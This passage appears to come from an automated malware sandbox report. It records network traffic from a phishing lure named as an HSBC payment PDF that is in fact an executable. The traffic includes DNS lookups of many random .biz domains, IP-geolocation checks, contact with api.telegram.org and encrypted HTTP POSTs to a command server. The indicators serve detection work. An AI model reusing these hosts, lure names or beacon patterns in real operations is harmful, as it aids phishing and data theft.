                                                                                                                                                                              Dec 11, 2024 09:26:13.540182114 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.540254116 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:13.542753935 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:13.665364027 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.117172956 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.238030910 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.238171101 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.238643885 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.238643885 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.359252930 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.359263897 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.493051052 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.497525930 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:14.617983103 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.903294086 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.947021961 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:15.087615013 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:15.087652922 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.087774038 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:15.093009949 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:15.093028069 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.337960005 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.338048935 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.338099957 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:15.338551998 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:15.459261894 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.920469046 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.041362047 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.041543007 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.042012930 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.042012930 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.162416935 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.162592888 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.311474085 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.311624050 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.317184925 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.317199945 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.317437887 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.368881941 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.371140957 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.415339947 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.759182930 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.759243965 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.759310007 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.765834093 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:17.188370943 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:17.228262901 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:17.338543892 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:17.459186077 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:17.459280968 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:17.465089083 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:17.585643053 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:20.718612909 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:20.759506941 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:21.129717112 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:21.250199080 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:21.250283003 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:21.250545979 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:21.371072054 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:21.864192009 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:21.986447096 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.270047903 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.321994066 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:22.412658930 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:22.412688971 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.412750006 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:22.413194895 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:22.413207054 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554306030 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554636955 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554718971 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.554822922 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554830074 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554857016 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554863930 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554886103 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.554914951 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.555110931 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555118084 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555124998 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555130959 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555155039 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.555205107 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.675265074 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.675343037 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.676187992 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.746599913 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.746676922 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.746788979 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.750765085 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.781728983 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:22.781763077 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:22.790818930 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.902136087 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.902328014 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.120907068 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.165766954 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:23.381673098 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:23.502516031 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.797808886 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.797880888 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:28:09.392035961 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.355875969 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.355987072 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.356100082 CET4996480192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:28:11.356175900 CET4996480192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:28:11.476582050 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 11, 2024 09:26:06.715599060 CET6015753192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:07.194257021 CET53601571.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:08.771385908 CET4973953192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:09.239639044 CET53497391.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.956470013 CET6147553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:10.094953060 CET53614751.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:11.489006996 CET5842453192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:11.964744091 CET53584241.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.958703041 CET6465653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:13.096537113 CET53646561.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.552428961 CET5417353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:14.045520067 CET53541731.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.945664883 CET6095253192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:15.086813927 CET53609521.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.356321096 CET5813053192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:15.859508038 CET53581301.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:17.197757959 CET5873353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:17.336075068 CET53587331.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:20.725092888 CET5227553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:21.128962040 CET53522751.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.273940086 CET5378053192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:22.411789894 CET53537801.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.131880045 CET5132553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:25.355968952 CET53513251.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.356894970 CET6311653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:25.977432013 CET53631161.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:28.635011911 CET6008353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:28.870990992 CET53600831.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:29.003189087 CET5942453192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:29.216865063 CET53594241.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:29.220451117 CET5233553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:26:30.097273111 CET53523351.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:14.800203085 CET5769653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:27:15.798722029 CET53576961.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:00.024872065 CET5488953192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:00.579090118 CET53548891.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:02.773384094 CET5621353192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:03.530263901 CET53562131.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:06.460102081 CET6307653192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:07.079525948 CET53630761.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:08.323911905 CET6045453192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:08.902352095 CET53604541.1.1.1192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:11.356839895 CET6391553192.168.2.51.1.1.1
                                                                                                                                                                              Dec 11, 2024 09:28:11.978425980 CET53639151.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 11, 2024 09:26:06.715599060 CET | 192.168.2.5 | 1.1.1.1 | 0xb8f | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:08.771385908 CET | 192.168.2.5 | 1.1.1.1 | 0x9442 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:09.956470013 CET | 192.168.2.5 | 1.1.1.1 | 0x4a1e | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:11.489006996 CET | 192.168.2.5 | 1.1.1.1 | 0x8665 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:12.958703041 CET | 192.168.2.5 | 1.1.1.1 | 0x1690 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:13.552428961 CET | 192.168.2.5 | 1.1.1.1 | 0xefbc | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:14.945664883 CET | 192.168.2.5 | 1.1.1.1 | 0x944f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:15.356321096 CET | 192.168.2.5 | 1.1.1.1 | 0xa56e | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:17.197757959 CET | 192.168.2.5 | 1.1.1.1 | 0xbba7 | Standard query (0) | ww99.przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:20.725092888 CET | 192.168.2.5 | 1.1.1.1 | 0x63c | Standard query (0) | ww12.przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:22.273940086 CET | 192.168.2.5 | 1.1.1.1 | 0x5b64 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:25.131880045 CET | 192.168.2.5 | 1.1.1.1 | 0x313c | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:25.356894970 CET | 192.168.2.5 | 1.1.1.1 | 0x2e04 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:28.635011911 CET | 192.168.2.5 | 1.1.1.1 | 0xd30b | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:29.003189087 CET | 192.168.2.5 | 1.1.1.1 | 0x67ce | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:29.220451117 CET | 192.168.2.5 | 1.1.1.1 | 0xb5c6 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:27:14.800203085 CET | 192.168.2.5 | 1.1.1.1 | 0xb4f | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:00.024872065 CET | 192.168.2.5 | 1.1.1.1 | 0xfe9f | Standard query (0) | xlfhhhm.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:02.773384094 CET | 192.168.2.5 | 1.1.1.1 | 0x9f19 | Standard query (0) | ifsaia.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:06.460102081 CET | 192.168.2.5 | 1.1.1.1 | 0xa470 | Standard query (0) | saytjshyf.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:08.323911905 CET | 192.168.2.5 | 1.1.1.1 | 0x6a7 | Standard query (0) | vcddkls.biz | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:11.356839895 CET | 192.168.2.5 | 1.1.1.1 | 0x6013 | Standard query (0) | fwiwk.biz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 11, 2024 09:26:07.194257021 CET | 1.1.1.1 | 192.168.2.5 | 0xb8f | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:09.239639044 CET | 1.1.1.1 | 192.168.2.5 | 0x9442 | No error (0) | ssbzmoy.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:10.094953060 CET | 1.1.1.1 | 192.168.2.5 | 0x4a1e | No error (0) | ssbzmoy.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:11.964744091 CET | 1.1.1.1 | 192.168.2.5 | 0x8665 | No error (0) | cvgrf.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:13.096537113 CET | 1.1.1.1 | 192.168.2.5 | 0x1690 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 09:26:13.096537113 CET | 1.1.1.1 | 192.168.2.5 | 0x1690 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:13.096537113 CET | 1.1.1.1 | 192.168.2.5 | 0x1690 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:13.096537113 CET | 1.1.1.1 | 192.168.2.5 | 0x1690 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:13.096537113 CET | 1.1.1.1 | 192.168.2.5 | 0x1690 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:13.096537113 CET | 1.1.1.1 | 192.168.2.5 | 0x1690 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:14.045520067 CET | 1.1.1.1 | 192.168.2.5 | 0xefbc | No error (0) | npukfztj.biz | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:15.086813927 CET | 1.1.1.1 | 192.168.2.5 | 0x944f | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:15.086813927 CET | 1.1.1.1 | 192.168.2.5 | 0x944f | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:15.859508038 CET | 1.1.1.1 | 192.168.2.5 | 0xa56e | No error (0) | przvgke.biz | | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:15.859508038 CET | 1.1.1.1 | 192.168.2.5 | 0xa56e | No error (0) | przvgke.biz | | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:17.336075068 CET | 1.1.1.1 | 192.168.2.5 | 0xbba7 | No error (0) | ww99.przvgke.biz | | 72.52.179.174 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:21.128962040 CET | 1.1.1.1 | 192.168.2.5 | 0x63c | No error (0) | ww12.przvgke.biz | 084725.parkingcrew.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 09:26:21.128962040 CET | 1.1.1.1 | 192.168.2.5 | 0x63c | No error (0) | 084725.parkingcrew.net | | 13.248.148.254 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:21.128962040 CET | 1.1.1.1 | 192.168.2.5 | 0x63c | No error (0) | 084725.parkingcrew.net | | 76.223.26.96 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:22.411789894 CET | 1.1.1.1 | 192.168.2.5 | 0x5b64 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:25.355968952 CET | 1.1.1.1 | 192.168.2.5 | 0x313c | Name error (3) | zlenh.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:25.977432013 CET | 1.1.1.1 | 192.168.2.5 | 0x2e04 | No error (0) | knjghuig.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:28.870990992 CET | 1.1.1.1 | 192.168.2.5 | 0xd30b | Name error (3) | uhxqin.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:29.216865063 CET | 1.1.1.1 | 192.168.2.5 | 0x67ce | Name error (3) | anpmnmxo.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:26:30.097273111 CET | 1.1.1.1 | 192.168.2.5 | 0xb5c6 | No error (0) | lpuegx.biz | | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:27:15.798722029 CET | 1.1.1.1 | 192.168.2.5 | 0xb4f | No error (0) | vjaxhpbji.biz | | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:00.579090118 CET | 1.1.1.1 | 192.168.2.5 | 0xfe9f | No error (0) | xlfhhhm.biz | | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:03.530263901 CET | 1.1.1.1 | 192.168.2.5 | 0x9f19 | No error (0) | ifsaia.biz | | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:07.079525948 CET | 1.1.1.1 | 192.168.2.5 | 0xa470 | No error (0) | saytjshyf.biz | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:08.902352095 CET | 1.1.1.1 | 192.168.2.5 | 0x6a7 | No error (0) | vcddkls.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:11.978425980 CET | 1.1.1.1 | 192.168.2.5 | 0x6013 | No error (0) | fwiwk.biz | | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 09:28:11.978425980 CET | 1.1.1.1 | 192.168.2.5 | 0x6013 | No error (0) | fwiwk.biz | | 172.234.222.138 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.54970454.244.188.177801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:07.415178061 CET360OUTPOST /ihnlsqbtrmkahnv HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:07.415178061 CET850OUTData Raw: 33 22 6e 74 0f e8 51 63 46 03 00 00 eb c0 5e dc cd 68 6a 03 b4 92 ff 50 54 c7 5f 0e f2 5f 52 a1 20 77 fc 75 8d 2f 22 ca 88 2e ca eb 52 aa 3c b0 d1 4c 6f f4 46 22 72 77 87 1f 3b 61 d5 d5 ea 08 fb ce 17 ab 1c 38 94 c7 b2 a9 5d 66 53 2a 4d 68 64 34
                                                                                                                                                                              Data Ascii: 3"ntQcF^hjPT__R wu/".R<LoF"rw;a8]fS*Mhd4`'d*VsVrY<"A*2f&L*H+N|!%,iihyB.w[)u1vqv$qn`R!nI\z+wL<9D
                                                                                                                                                                              Dec 11, 2024 09:26:08.756006002 CET413INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:08 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=9e6364b128142aad518b5fb15c7e6226|8.46.123.175|1733905568|1733905568|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.54970554.244.188.177801900C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:08.414887905 CET361OUTPOST /taohikdratudiqxk HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 892
                                                                                                                                                                              Dec 11, 2024 09:26:08.414907932 CET892OUTData Raw: c2 6a d9 07 fb da 7a 94 70 03 00 00 de f6 78 ec 1b ae 80 93 d0 99 ad 18 ea ad b0 d3 4e 97 d2 b2 49 dc fc db 85 03 6f 3d 24 a8 93 64 24 64 98 89 f7 40 68 53 17 25 f0 ae 5e 61 eb 0c d7 08 e0 1d 80 7a aa 09 b8 51 9c ec 0e 96 a7 5f c1 a1 4b ff 22 ca
                                                                                                                                                                              Data Ascii: jzpxNIo=$d$d@hS%^azQ_K"P92>?jc^Z,@<WAx;~&f^|X>xle5g_`VL)[F?AWc*9d,oqtD^[ ;^?
                                                                                                                                                                              Dec 11, 2024 09:26:09.952672005 CET413INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:09 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
